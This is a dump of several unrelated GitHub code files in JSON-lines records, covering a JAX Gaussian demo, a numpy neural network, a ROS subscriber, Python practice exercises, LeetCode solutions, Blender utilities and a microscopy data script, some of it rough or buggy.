doesn't like it if you mutate the tree def of things in a few\ncases, so it's good practice - despite being inefficient - to always copy\nbefore mutation. That's how these functions are immutable.)\n\"\"\"\n\n# %%\n\ny = x_dict.lin_op(lambda x: assign(x, \"c\", jnp.array([[x[\"b\"], -x[\"b\"]], [3.0 * x[\"b\"], x[\"b\"]]])))\n\nprint(y.mean_as())\nprint(y.covariance_as())\n\n# %%\n\n\"\"\"\nThis covariance is a bit of a mess, so let's sample to get a sense of what's going on instead.\n\"\"\"\n\n# %%\n\nsamples = y.sample(jax.random.PRNGKey(2), (4,))\nsamples.shape\n\n# %%\n\n\"\"\"\nSamples are returned in flattened shape, but we can transform into the data\nshape if desired.\n\"\"\"\n\n# %%\n\nsamples_dict = y.flat_value_config.as_tree(samples, dim=-1)\nsamples_dict\n\n# %%\n\n\"\"\"\nThe details of maintaining a non-flat representation are handled by the `flat_value_config`.\n\"\"\"\n\n# %%\n\n\"\"\"\nOther operations are also supported of course.\n\"\"\"\n\n# %%\n\nadd_vals = x_dict.add(lambda x: operate(x, \"a\", \"a\", lambda l: l + 4))\nprint(x_dict.mean_as())\nprint(add_vals.mean_as())\nprint(x_dict.covariance_as()[\"a\"])\nprint(add_vals.covariance_as()[\"a\"])\n\n# %%\n\nset_vals = x_dict.set(\n set_to=2.7, setter=lambda x, set_to: operate(x, \"a\", \"a\", lambda x: jnp.broadcast_to(set_to, x.shape))\n)\nprint(x_dict.mean_as())\nprint(set_vals.mean_as())\nprint(x_dict.covariance_as()[\"a\"])\nprint(set_vals.covariance_as()[\"a\"])\n\n# %%\n\nset_vals = x_dict.set(\n # the set to value can be an arbitrary pytree\n set_to={\"first\": 2.7, \"second\": 9.1},\n setter=lambda x, set_to: (\n operate_f(\"a\", \"a\", lambda v: jnp.broadcast_to(set_to[\"first\"], v.shape))\n @ operate_f(\"b\", \"b\", lambda v: jnp.broadcast_to(set_to[\"second\"], v.shape))\n )(x),\n)\nprint(x_dict.mean_as())\nprint(set_vals.mean_as())\nprint(x_dict.covariance_as())\nprint(set_vals.covariance_as())\n\n\n# %%\n\n\"\"\"\nNote that if functions passed to various operations don't do 'what they're\nsupposed to do', then you'll get incorrect results. For instance, don't pass a\nnon-linear function to .lin_op (affine isn't ok - just linear!).\n\nFunctions with such demands have docstrings explaining what's up.\n\"\"\"\n\n# %%\n\n# a : (2,)\n# b : (3,2)\nvals = MultivariateNormal(jnp.ones((8,)), jnp.eye(8)).lin_op(lambda x: {\"a\": x[:2], \"b\": x[2:].reshape(3, 2)})\n\na, b = vals.mean_as()[\"a\"], vals.mean_as()[\"b\"]\njnp.einsum(a, [\"n\"], b, [\"m\", \"n\"], [\"m\"])\n\n# %%\n\n# compare to einsum above\nmulled = vals.mul_select(\n selector_l=lambda x: x[\"a\"],\n l_axes_names=[\"n\"],\n selector_r=lambda x: x[\"b\"],\n r_axes_names=[\"m\", \"n\"],\n out_axes_names=[\"m\"],\n combine=lambda new, _: new,\n)\nmulled.covariance_as()\n\n# %%\n\n\"\"\"\nA decent number of examples for various operations and immutable_dict\noperations can be found by going through the apply_to_normal function in\nUnidirectionalAttn.\n\"\"\"\n\n\n# %%\n\n\"\"\"\nAnother operation of interest is conditioning.\n\"\"\"\n\n# %%\n\nto_cond_x = MultivariateNormal(jnp.array([1, 2.0]), jnp.array([[1, 0.8], [0.8, 3.0]])).lin_op(\n lambda x: {\"a\": x[0], \"b\": x[1]}\n)\ncond_x = to_cond_x.condition(selector=lambda x: x[\"a\"], value=0.0)\nprint(cond_x.mean_as())\nprint(cond_x.covariance_as())\nprint(cond_x.sample(jax.random.PRNGKey(2838), (10,)))\n\n# %%\n\n\"\"\"\nWe can condition on a == b by setting the difference equal to zero.\n\nNumerics on this aren't great...\n\"\"\"\n\n# %%\n\neq_cond_x = to_cond_x.condition(lambda x: x[\"a\"] - x[\"b\"], 0.0)\nprint(eq_cond_x.sample(jax.random.PRNGKey(2838), (10,)))\n\n# %%\n\n\"\"\"\nWe can also select and condition on a pytree if desired.\n\"\"\"\n\n# %%\n\n\nto_cond_x = MultivariateNormal(jnp.zeros((3,)), jnp.eye(3)).lin_op(\n lambda x: {\n \"a\": x[0] + 3 * x[2],\n \"b\": x[0] + x[1] * 2 - x[2],\n \"c\": x[2],\n }\n)\ncond_x = to_cond_x.condition(\n selector=keep_only_f([\"b\", \"c\"]),\n value={\"b\": -10.0, \"c\": 12.0},\n # Passing a setter will increase numerical accuracy when we just select a\n # subset - try removing the setter.\n setter=lambda x, set_to: (\n assign_f(\"b\", set_to[\"b\"], check_present=True) @ assign_f(\"c\", set_to[\"c\"], check_present=True)\n )(x),\n)\nprint(cond_x.mean_as())\nprint(cond_x.covariance_as())\nprint(cond_x.sample(jax.random.PRNGKey(2838), (10,)))\n","repo_name":"redwoodresearch/interp","sub_path":"interp/demos/simple_multivariate_normal.py","file_name":"simple_multivariate_normal.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"71884318440","text":"from layers import *\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n\ndef initialize_parameters(layer_dims):\n \"\"\"\n input:\n an array of the dimensions of each layer in the network (layer 0 is the size of the flattened input, layer L is the output sigmoid)\n output:\n a dictionary containing the initialized W and b parameters of each layer (W1...WL, b1...bL).\n \"\"\"\n params = {}\n layer_input_dim = layer_dims[0]\n num_classes = layer_dims[-1]\n\n # input-> hidden_layer_1 -> hidden_layer_2 -> ... -> hidden_layer_last\n for idx, dim in enumerate(layer_dims[1:]): # enumerate all hidden layers\n layer_num = str(idx+1)\n #params['W' + layer_num] = np.random.randn(layer_input_dim, dim)\n params['W' + layer_num] = np.random.randn(layer_input_dim, dim) * np.sqrt(2/layer_input_dim)\n params['b' + layer_num] = np.zeros(dim)\n layer_input_dim = dim\n\n # hidden_layer_last -> output\n num_layers = len(layer_dims)\n params['W' + str(num_layers)] = np.random.randn(layer_input_dim, num_classes) * np.sqrt(1/layer_input_dim)\n params['b' + str(num_layers)] = np.zeros(num_classes)\n\n return params\n\n\ndef L_model_forward(X, parameters, use_batchnorm, dropout):\n \"\"\"\n forward propagation for the [LINEAR->RELU]*(L-1)->LINEAR->SOFTMAX computation\n\n :param X: the data, numpy array of shape (input size, number of examples)\n :param parameters: the initialized W and b parameters of each layer\n :param use_batchnorm: a boolean flag used to determine whether to apply batchnorm after the activation\n :param dropout: Scalar between 0 and 1 giving dropout strength.\n If dropout=1 then the network should not use dropout at all.\n :return: (the last post-activation value , a list of all the cache objects)\n \"\"\"\n layer_input = X\n caches = []\n dropout_cache = {} # cache for dropout layer\n batchnorm_cache = {} # cache for batchnorm layer\n num_layers = len([key for key in parameters.keys() if key.startswith('W')])\n use_dropout = dropout != 1\n\n for layer_idx in range(1, num_layers):\n W, b = parameters['W' + str(layer_idx)], parameters['b' + str(layer_idx)]\n layer_input, layer_cache, batchnorm_cache[layer_idx] = linear_activation_forward(layer_input, W, b, 'relu', use_batchnorm)\n caches.append(layer_cache)\n\n if use_dropout:\n layer_input, dropout_cache[layer_idx] = dropout_forward(layer_input, dropout)\n\n # last layer\n W, b = parameters['W' + str(num_layers)], parameters['b' + str(num_layers)]\n last_post_activation, layer_cache, _ = linear_activation_forward(layer_input, W, b, 'softmax', False)\n caches.append(layer_cache)\n\n return last_post_activation, caches, batchnorm_cache, dropout_cache\n\n\ndef compute_cost(AL, Y):\n \"\"\"\n Implement the cost function defined by equation. The requested cost function is categorical cross-entropy loss.\n\n :param AL: – probability vector corresponding to your label predictions, shape (num_of_classes, number of examples)\n :param Y: the labels vector (i.e. the ground truth)\n :return: the cross-entropy cost\n \"\"\"\n return - np.sum((Y * np.log(AL))) / Y.shape[0]\n\n\ndef L_model_backward(AL, Y, caches, use_batchnorm, batchnorm_cache, dropout_cache):\n \"\"\"\n Backward propagation process for the entire network.\n\n :param AL: the probabilities vector, the output of the forward propagation (L_model_forward)\n :param Y: the true labels vector (the \"ground truth\" - true classifications)\n :param caches: list of caches containing for each layer: a) the linear cache; b) the activation cache\n :param batchnorm_cache: the cache for the batchnorm\n :param dropout_cache: the cache for the dropout\n :return: a dictionary with the gradients\n \"\"\"\n\n grads = {}\n num_layers = len(caches)\n use_dropout = len(dropout_cache) != 0\n\n last_layer_idx = num_layers\n dA, dW, db = linear_backward(AL - Y, caches[-1]['linear_cache'])\n grads['dA' + str(last_layer_idx)] = dA\n grads['dW' + str(last_layer_idx)] = dW\n grads['db' + str(last_layer_idx)] = db\n\n for layer_idx in reversed(range(1, num_layers)):\n if use_dropout:\n dA = dropout_backward(dA, dropout_cache[layer_idx])\n\n dA, dW, db = linear_activation_backward(dA , caches[layer_idx - 1], \"relu\", use_batchnorm, batchnorm_cache[layer_idx])\n grads['dA' + str(layer_idx)] = dA\n grads['dW' + str(layer_idx)] = dW\n grads['db' + str(layer_idx)] = db\n\n return grads\n\n\ndef update_parameters(parameters, grads, learning_rate):\n \"\"\"\n Updates parameters using gradient descent\n\n :param parameters: a python dictionary containing the DNN architecture’s parameters\n :param grads: a python dictionary containing the gradients (generated by L_model_backward)\n :param learning_rate: the learning rate used to update the parameters (the “alpha”)\n :return: – the updated values of the parameters object provided as input\n \"\"\"\n\n num_layers = len([key for key in parameters.keys() if key.startswith('W')])\n\n for layer_idx in range(1, num_layers + 1):\n old_W, dW = parameters['W' + str(layer_idx)], grads['dW' + str(layer_idx)]\n old_b, db = parameters['b' + str(layer_idx)], grads['db' + str(layer_idx)]\n\n parameters['W' + str(layer_idx)] = old_W - learning_rate * dW\n parameters['b' + str(layer_idx)] = old_b - learning_rate * db\n\n return parameters\n\ndef L_layer_model(X, Y,\n layers_dims,\n learning_rate,\n num_iterations,\n batch_size,\n use_batchnorm,\n min_epochs,\n dropout=1):\n \"\"\"\n {affine - [batch/layer norm] - relu - [dropout]} x (L - 1) - affine - softmax\n\n :param X: the input data, a numpy array of shape (height*width , number_of_examples)\n :param Y: the “real” labels of the data, a vector of shape (num_of_classes, number of examples)\n :param layers_dims: a list containing the dimensions of each layer, including the input\n :param learning_rate: the learning rate\n :param num_iterations: number of iterations\n :param batch_size: the number of examples in a single training batch.\n :param use_batchnorm: use batchnorm or not\n :param min_epochs: minimum number of epochs to execute before checking stoping criteria\n :param dropout: Scalar between 0 and 1 giving dropout strength.\n If dropout=1 then the network should not use dropout at all.\n :return: (parameters, costs, val_accuracies, train_accuracies, training_last_accuracy, validation_last_accuracu) -\n the parameters learnt by the system during the training (the same parameters\n that were updated in the update_parameters function) and the values of the cost\n function (calculated by the compute_cost function). One value is to be saved\n after each 100 training iterations (e.g. 3000 iterations -> 30 values)..\n val_accuracies - accuracy per 100 iterations on the validation set\n train_accuracies - accuracy per 100 iterations on the training set\n training_last_accuracy - final accuracy on the training set\n validation_last_accuracu - final accuracy on the validation set\n \"\"\"\n # split to train and val\n X_train, X_val, y_train, y_val = train_test_split(X, Y,\n test_size=0.2,\n stratify=Y, random_state=42)\n\n # initialization\n parameters = initialize_parameters([X.shape[1]] + layers_dims)\n costs = []\n accs_per_100_iterations = []\n costs_per_100_iterations = []\n train_accs_pre_100_iterations = []\n\n iterations_counter = 0\n epoch_counter = 0\n val_acc_no_improvement_count = 0\n best_val_acc_value = 0\n\n while iterations_counter < num_iterations:\n for X_batch, Y_batch in next_batch(X_train, y_train, batch_size):\n\n # forward pass\n AL, caches, batchnorm_cache, dropout_caches = L_model_forward(X_batch, parameters, use_batchnorm, dropout)\n\n # compute the cost and document it\n cost = compute_cost(AL, Y_batch)\n costs.append(cost)\n\n # backward pass\n grads = L_model_backward(AL, Y_batch, caches, use_batchnorm, batchnorm_cache, dropout_caches)\n\n # update parameters\n parameters = update_parameters(parameters, grads, learning_rate)\n\n iterations_counter += 1\n\n # document performance every 100 iterations\n val_acc = predict(X_val, y_val, parameters, use_batchnorm)\n if iterations_counter % 100 == 0:\n accs_per_100_iterations.append(val_acc)\n train_acc = predict(X_train, y_train, parameters, use_batchnorm)\n train_accs_pre_100_iterations.append(train_acc)\n costs_per_100_iterations.append(cost)\n print('iteration step: {} | cost: {}'.format(iterations_counter, cost))\n\n # check if accuracy improved\n if val_acc > best_val_acc_value:\n best_val_acc_value = val_acc\n val_acc_no_improvement_count = 0\n val_acc_no_improvement_count += 1\n\n # check stop criteria\n if val_acc_no_improvement_count >= 100 and epoch_counter >= min_epochs:\n train_acc = predict(X_train, y_train, parameters, use_batchnorm)\n val_acc = predict(X_val, y_val, parameters, use_batchnorm)\n return parameters, costs_per_100_iterations, accs_per_100_iterations, train_accs_pre_100_iterations, train_acc, val_acc\n epoch_counter += 1\n\n train_acc = predict(X_train, y_train, parameters, use_batchnorm)\n val_acc = predict(X_val, y_val, parameters, use_batchnorm)\n return parameters, costs_per_100_iterations, accs_per_100_iterations, train_accs_pre_100_iterations, train_acc, val_acc\n\n\ndef predict(X, Y, parameters, use_batchnorm):\n \"\"\"\n Description:\n The function receives an input data and the true labels and calculates the accuracy of\n the trained neural network on the data.\n Input:\n X – the input data, a numpy array of shape (height*width, number_of_examples)\n Y – the “real” labels of the data, a vector of shape (num_of_classes, number of examples)\n parameters – a python dictionary containing the DNN architecture’s parameters\n Output:\n accuracy – the accuracy measure of the neural net on the provided data (i.e. the\n percentage of the samples for which the correct label receives over 50% of the\n confidence score). Use the softmax function to normalize the output values.\n \"\"\"\n scores, _, _, _ = L_model_forward(X, parameters, use_batchnorm=use_batchnorm, dropout=1) # test time\n predictions = np.argmax(scores, axis=1)\n Y_flatten = np.argmax(Y, axis=1)\n return accuracy_score(Y_flatten, predictions)\n\n\ndef next_batch(X, y, batchSize):\n # loop over our dataset X in mini-batches of size batchSize\n for i in np.arange(0, X.shape[0], batchSize):\n # yield a tuple of the current batched data and labels\n yield (X[i: i+batchSize, :], y[i: i+batchSize, :])","repo_name":"elisim/Deep-Learning-Intro","sub_path":"assignment1/fc_net.py","file_name":"fc_net.py","file_ext":"py","file_size_in_byte":11568,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"39843850042","text":"#! /usr/bin/env python\n\nimport rospy\nfrom nav_msgs.msg import Odometry\nimport json\nfrom nav_msgs.msg import Path\nimport math\nsum = 0 \ndef callback(msg): \n\n # read previous data\n print('here')\n \n with open('sample.json', 'r') as openfile:\n jsonObject = json.load(openfile)\n openfile.close()\n \n # append the current coordinates\n x[0]= msg.poses[0].pose.position.x\n y[0]= msg.poses[0].pose.position.y\n\n sum= math.sqrt (x[0]**2)\n \n (jsonObject['xCoordinates']).append(sum)\n\n #(jsonObject['xCoordinates']).append(msg.poses[0].pose.position.x)\n # (jsonObject['yCoordinates']).append(msg.poses[0].pose.position.y)\n \n # write the updated data into json file\n with open(\"sample.json\", \"w\") as outfile:\n json.dump(jsonObject, outfile)\n outfile.close()\n\n\nrospy.init_node('global_Subscriber_odom') #change name\n\nsub=rospy.Subscriber('/move_base_node/DWAPlannerROS/local_plan',Path,callback) # 1_DWA\n#sub=rospy.Subscriber('/move_base_node/TebLocalPlannerROS/local_plan',Path,callback) #1_TEB \n\n#sub=rospy.Subscriber('/mobile_base_controller/odom',Odometry,callback) #\nrospy.spin()\n\nif __name__ == '__main__':\n jsonObject = {'xCoordinates': [], 'yCoordinates' : []}\n callback()\n","repo_name":"mfouad992/Multi_Robot_Mohamed","sub_path":"src/mir/mir_gazebo/launch/Date_recorder/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40308179013","text":"# Seprate the neg ,pos, and zero\n# Input : 10 -1 -3 -4 0 0 45 42\n# OutPut : [10, 45, 42] [-1, -3, -4] [0, 0]\ndef p1():\n ls = list(map(int,input().split()))\n n = len(ls)\n pos = [0]*n\n neg = [0]*n\n zero = [0]*n\n p,n,z=0,0,0\n for i in ls:\n if i==0:\n zero[z] = i\n z+=1\n elif i<=0:\n neg[n]=i\n n+=1\n else:\n pos[p] = i\n p+=1\n print(pos[:p],neg[:n],zero[:z])\n\n# p1()\n\n\n# linear search\n# 4 5 8 10 11 15 1 \ndef p2():\n ls = list(map(int,input().split()))\n print(ls)\n n = len(ls)\n key = int(input(\"Enter The Element To Search = \"))\n for i in range(n):\n if(ls[i]==key):\n print(key,\"Find at Index \",i)\n\n# p2()\n\n\n\n# binary serach\ndef p3():\n ls = list(map(int,input().split()))\n print(ls)\n s = 0 \n e = len(ls)-1\n key = int(input(\"Enter The Element To Search = \"))\n while s<=e :\n mid = (s+e)//2\n if ls[mid] == key:\n print(f\"Element is present at {mid}\")\n break\n elif ls[mid]< key:\n s = mid + 1\n else:\n e = mid-1\n else:\n print(\"Not Present\")\n\n\n# given list is palindrome\n\n# ls = list(map(int,input().split()))\n# i = 0\n# j=len(ls)-1\n# while(i<=j):\n# if ls[i]!=ls[j]:\n# print(\"Not Palindrom list\")\n# break\n# i+=1\n# j-=1\n# else:\n# print(\"Not Palindrom list\")\n\n\n# dictionary\nd = {\n \"name\":\"ajay devgan\",\n \"age\": 55,\n \"salary\":30000,\n \"experienc\":10\n}\n\nfor key, val in d.items():\n print(key,val)\n\n\nls = [10,20,10,20,30,20,10,]\n\n\n","repo_name":"vivekPatil45/Python-ESDP","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71335772840","text":"# 277. Find the Celebrity\n# Array\n\n# TLE\nclass Solution1:\n def findCelebrity(self, n: int) -> int:\n self.knowOthers = collections.defaultdict(int)\n self.otherKnows = collections.defaultdict(int)\n notC = set()\n \n for i in range(n-1):\n for j in range(i+1, n):\n if knows(i, j):\n self.knowOthers[i] += 1\n self.otherKnows[j] += 1\n notC.add(i)\n if knows(j, i):\n self.knowOthers[j] += 1\n self.otherKnows[i] += 1\n notC.add(j)\n \n if len(notC) == n:\n return -1\n \n for i in range(n):\n if i not in notC:\n if self.knowOthers.get(i, 0) == 0 and self.otherKnows[i] == n-1:\n return i\n return -1\n\n\n# https://leetcode.com/problems/find-the-celebrity/solution/\n# runtime: O(n)\nclass Solution2:\n def findCelebrity(self, n: int) -> int:\n c = 0\n for i in range(1, n):\n if knows(c, i):\n c = i\n \n for j in range(n):\n if j == c:\n continue\n if knows(c, j) or not knows(j, c):\n return -1\n \n return c","repo_name":"junyang10734/leetcode-python","sub_path":"277.py","file_name":"277.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18723774861","text":"def anss(arr) :\n ran = 0\n ans = 0\n # print(len(arr))\n print(arr)\n while ans < sum:\n ans = ans + arr[ran]\n ran = ran + 1\n # if ans > sum :\n # print(\"Break\")\n return ans, arr[0], ran\n\nsum = int(input(\"Enter the sum\"))\n# arr = []\n# arrRange = int(input(\"enter the range of the array\"))\n# for i in range(0, arrRange) :\n# getIn = int(input(\"Enter elements in an array\"))\n# arr.append(getIn)\narr = [1,2,3,7,5,6,7,8,9,10]\ncop = arr.copy()\n\nnav = 0\nfis = 0\ncheckValue = 0\nfor i in arr :\n checkValue = checkValue + i\nprint(checkValue)\nif sum <= checkValue :\n while nav < sum:\n nav = nav + arr[fis]\n fis = fis + 1\n\n name = anss(arr)\n\n if nav == sum:\n print(1, fis)\n else:\n count = 0\n while name[0] != sum:\n count = count + 1\n arr.pop(0)\n name = anss(arr)\n print(name[0])\n\n if name[0] == sum:\n value = cop.index(name[1])\n print(value + 1, value + name[2])\n else:\n print(\"The sum is not present in the range of numbers given\")\n # if count > len(cop) :\n # print(cop.index(name[1]) + 1, count + 2)\n # else :\n # print(cop.index(name[1]) + 1, count + 1)\nelse:\n print(\"The sum is not present in the range of numbers given\")\n","repo_name":"Muralijeya/pythonProject","sub_path":"amazon_Problems.py","file_name":"amazon_Problems.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11366826783","text":"import bpy\nimport re\nimport numpy as np\n\n\"\"\"\nLibrary collecting general utils in math or Blender API that are used frequently throughout the code but aren't tied to a specific task\n\"\"\"\n\ndef setSelectOfObjectAndChildren(obj, selectState):\n \"\"\"\n Sets a node and its hierarchy to a given selectState (True or False)\n \"\"\"\n obj.select_set(selectState)\n \n for child in obj.children:\n setSelectOfObjectAndChildren(child, selectState)\n\ndef setNewParent(obj, newParent, keep_transform=False):\n bpy.ops.object.select_all(action='DESELECT')\n\n obj.select_set(True)\n newParent.select_set(True)\n bpy.context.view_layer.objects.active = newParent\n\n bpy.ops.object.parent_set(keep_transform=keep_transform)\n\ndef getChildrenWithNameContaning(parent, stringToSearch):\n \"\"\"\n Returns all children of an objects whose names contain a user-provided string\n \"\"\"\n return [child for child in parent.children if (re.search(stringToSearch, child.name) != None)]\n\ndef getChildWithNameContaining(parent, stringToSearch):\n \"\"\"\n Returns a child whose name contains a given string, and None if no such child exist/more than one exists\n \"\"\"\n foundChildren = getChildrenWithNameContaning(parent, stringToSearch)\n \n if len(foundChildren) == 0:\n #No child has the name\n #warnings.warn(\"No child of '{}' with name containing '{}' found.\".format(parent.name, stringToSearch))\n return None\n elif len(foundChildren) == 1:\n #We found exactly one child with this name\n return foundChildren[0]\n else:\n #More than one child with this name was found\n #warnings.warn(\"More than one child of '{}' with name containing '{}' found.\".format(parent.name, stringToSearch))\n return None\n\ndef selectObjAndHierarchy(obj):\n bpy.context.view_layer.objects.active = obj\n obj.select_set(True)\n bpy.ops.object.select_hierarchy(direction='CHILD', extend=True)\n\ndef deleteObjAndHierarchy(obj):\n bpy.ops.object.select_all(action='DESELECT')\n selectObjAndHierarchy(obj)\n bpy.ops.object.delete()\n\ndef duplicateObjectAndHierarchy(obj, linked=False):\n # Selecting only the object and its hiearchy, and duplicating it\n bpy.ops.object.select_all(action='DESELECT')\n selectObjAndHierarchy(obj)\n bpy.ops.object.duplicate(linked=True)\n\n # Returning the duplicate root object, that is the one sharing the same data as the original root object\n dupObj = None\n dupObjsData = [ob.data for ob in bpy.context.selected_objects]\n if not obj.data in dupObjsData:\n raise Exception(\"For some reason, no duplicate object carries the original data. Check if objects were properly selected or if the duplication was set to 'Linked'.\")\n\n dupObj = bpy.context.selected_objects[dupObjsData.index(obj.data)]\n\n # If the user specified for the duplicate not to be linked, we make its properties local\n if not linked:\n bpy.ops.object.make_single_user(object=True, obdata=True, material=True, animation=True, obdata_animation=True)\n\n return dupObj\n\ndef getSphericalCoordinates(radius : float, theta : float, phi : float):\n return radius * np.array([np.cos(phi) * np.sin(theta), np.sin(phi) * np.sin(theta), np.cos(theta)])\n\ndef lookAtFromPos(targetPos, lookPos, upVector = np.array([0.0, 0.0, 1.0])):\n \"\"\"\n Returns the transform to apply to an object so that it looks towards targetPos, from a given position lookPos and with a given up vector upVector\n :param nparray targetPos: Position to which to look\n :param nparray lookPos: Position from which to look\n :param nparray upVector: The world up vector\n \"\"\"\n zAxis = targetPos - lookPos\n zAxis = zAxis / np.linalg.norm(zAxis)\n\n yAxis = None\n usedUpVec = np.array(upVector)\n if abs(np.dot(zAxis, usedUpVec)) == 1.0:\n #If the zAxis and up vector share the same direction, we find an arbitrary yAxis orthogonal to zAxis\n yAxis = np.array([zAxis[1], -zAxis[0], 0.0]) if (zAxis[1] != 0.0 or zAxis[0] != 0.0) else np.array([zAxis[2], 0.0, -zAxis[0]])\n else:\n yAxis = np.cross(zAxis, usedUpVec)\n yAxis = yAxis / np.linalg.norm(yAxis)\n\n xAxis = np.cross(zAxis, yAxis)\n xAxis = xAxis / np.linalg.norm(xAxis)\n\n transform = np.concatenate([yAxis, -xAxis, -zAxis, lookPos]).reshape((4, 3)).T\n transform = np.concatenate([transform, np.array([[0.0, 0.0, 0.0, 1.0]])])\n \n return transform.T","repo_name":"TheFamousRat/ChessR","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7824944133","text":"import os\nimport sys\nimport subprocess\nimport re\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.messagebox import askyesno\nfrom natsort import natsorted\nfrom tqdm import tqdm\n\nscript_dirpath = os.path.dirname(os.path.realpath(__file__))\nsrc_path = os.path.dirname(script_dirpath)\nsys.path.insert(0, src_path)\n\nimport load, prompts, apps, core\n\nclass beyond_listdir_pos:\n def __init__(self, folder_path, spotMAX_data_foldername):\n self.bp = apps.tk_breakpoint()\n self.folder_path = folder_path\n self.TIFFs_paths = []\n self.count_recursions = 0\n self.spotMAX_data_foldername = spotMAX_data_foldername\n self.listdir_recursion(folder_path)\n if not self.TIFFs_paths:\n raise FileNotFoundError(f'Path {folder_path} is not valid!')\n self.all_exp_info = self.count_analysed_pos()\n\n def listdir_recursion(self, folder_path):\n if os.path.isdir(folder_path):\n listdir_folder = natsorted(os.listdir(folder_path))\n contains_pos_folders = any([name.find('Position_')!=-1\n for name in listdir_folder])\n if not contains_pos_folders:\n contains_TIFFs = any([name=='TIFFs'\n for name in listdir_folder])\n contains_mitoQ_data = any([name==self.spotMAX_data_foldername\n for name in listdir_folder])\n rec_count_ok = self.count_recursions < 15\n if contains_TIFFs and contains_mitoQ_data and rec_count_ok:\n self.TIFFs_paths.append(f'{folder_path}/'\n f'{self.spotMAX_data_foldername}')\n elif contains_TIFFs and rec_count_ok:\n self.TIFFs_paths.append(f'{folder_path}/TIFFs')\n elif rec_count_ok:\n for name in listdir_folder:\n subfolder_path = f'{folder_path}/{name}'\n self.listdir_recursion(subfolder_path)\n self.count_recursions += 1\n else:\n raise RecursionError(\n 'Recursion went too deep and it was aborted '\n 'Check that the experiments contains the TIFFs folder')\n else:\n exp_path = os.path.dirname(os.path.dirname(folder_path))\n contains_mitoQ_data = any([name==self.spotMAX_data_foldername\n for name in listdir_folder])\n self.TIFFs_paths.append(exp_path)\n\n def get_rel_path(self, path):\n rel_path = ''\n parent_path = path\n count = 0\n while parent_path != self.folder_path or count==10:\n if count > 0:\n rel_path = f'{os.path.basename(parent_path)}/{rel_path}'\n parent_path = os.path.dirname(parent_path)\n count += 1\n rel_path = f'.../{rel_path}'\n return rel_path\n\n def count_analysed_pos(self):\n all_exp_info = []\n valid_TIFFs_path = []\n for path in self.TIFFs_paths:\n rel_path = self.get_rel_path(path)\n foldername = os.path.basename(path)\n if foldername == self.spotMAX_data_foldername:\n exp_info = f'{rel_path} (All Pos. DataFrames ALREADY generated)'\n else:\n exp_info = f'{rel_path} (DataFrames NOT present!)'\n all_exp_info.append(exp_info)\n return all_exp_info\n\ndef add_cca_info(pos_df, pos_cca_df):\n frames = pos_df.index.get_level_values(0)\n IDs = pos_df.index.get_level_values(1)\n if 'frame_i' in pos_cca_df.columns:\n pos_cca_df = pos_cca_df.reset_index().set_index(['frame_i', 'Cell_ID'])\n cc_stages = pos_cca_df['Cell cycle stage'].loc[(frame_i, IDs)]\n cc_nums = pos_cca_df['# of cycles'].loc[(frame_i, IDs)]\n relationships = pos_cca_df['Relationship'].loc[(frame_i, IDs)]\n relatives_IDs = pos_cca_df['Relative\\'s ID'].loc[(frame_i, IDs)]\n OFs = pos_cca_df['OF'].loc[(frame_i, IDs)]\n else:\n cc_stages = pos_cca_df['Cell cycle stage'].loc[IDs]\n cc_nums = pos_cca_df['# of cycles'].loc[IDs]\n relationships = pos_cca_df['Relationship'].loc[IDs]\n relatives_IDs = pos_cca_df['Relative\\'s ID'].loc[IDs]\n OFs = pos_cca_df['OF'].loc[IDs]\n pos_df['Cell Cycle Stage'] = cc_stages.to_list()\n pos_df['Cycle repetition #'] = cc_nums.to_list()\n pos_df['Relationship'] = relationships.to_list()\n pos_df['Relative\\'s ID'] = relatives_IDs.to_list()\n pos_df['OF'] = OFs.to_list()\n return pos_df\n\n\ndef check_IDs_match(pos_df, cca_df, cca_df_path, pos_df_path):\n IDs_match = [ID in cca_df.index for ID in pos_df.index.get_level_values(1)]\n if all(IDs_match):\n return True\n else:\n print(cca_df.index)\n print(pos_df.index.get_level_values(1))\n print(cca_df)\n print(pos_df)\n err = (f'Cell cycle stage analysis at\\n\\n'\n f'{cca_df_path}\\n\\n has IDs that are not the same of the '\n 'analysis file at:\\n\\n'\n f'{pos_df_path}\\n\\nRun cell cycle analysis again')\n tk.messagebox.showerror('IDs mismatch!', err)\n raise ValueError(err)\n\n\nclass replace_or_skip:\n def __init__(self):\n self.replace = False\n self.skip = False\n self.asked_once = False\n\n\n\n#expand dataframe beyond page width in the terminal\npd.set_option('display.max_columns', 20)\npd.set_option('display.max_rows', 300)\npd.set_option('display.precision', 3)\npd.set_option('display.expand_frame_repr', False)\n\n# Select experiment path\nsrc_listdir = os.listdir(src_path)\nmain_idx = [i for i, f in enumerate(src_listdir) if f.find('main_') !=- 1][0]\nmain_filename = src_listdir[main_idx]\nNUM = re.findall('v(\\d+).py', main_filename)[0]\nvNUM = f'v{NUM}'\nselected_path = prompts.folder_dialog(title=\n \"Select folder containing valid experiments\")\nspotMAX_data_foldername = ''\nif selected_path.find('TIFFs') != -1:\n selected_paths = [selected_path]\n TIFFs_path = selected_path\nelse:\n beyond_listdir_pos = beyond_listdir_pos(\n selected_path, spotMAX_data_foldername\n )\n selector = load.select_exp_folder()\n selector.run_widget(beyond_listdir_pos.all_exp_info,\n title='Concatenate all Positions',\n label_txt='Select experiment to generate DataFrames',\n full_paths=beyond_listdir_pos.TIFFs_paths,\n showinexplorer_button=True,\n 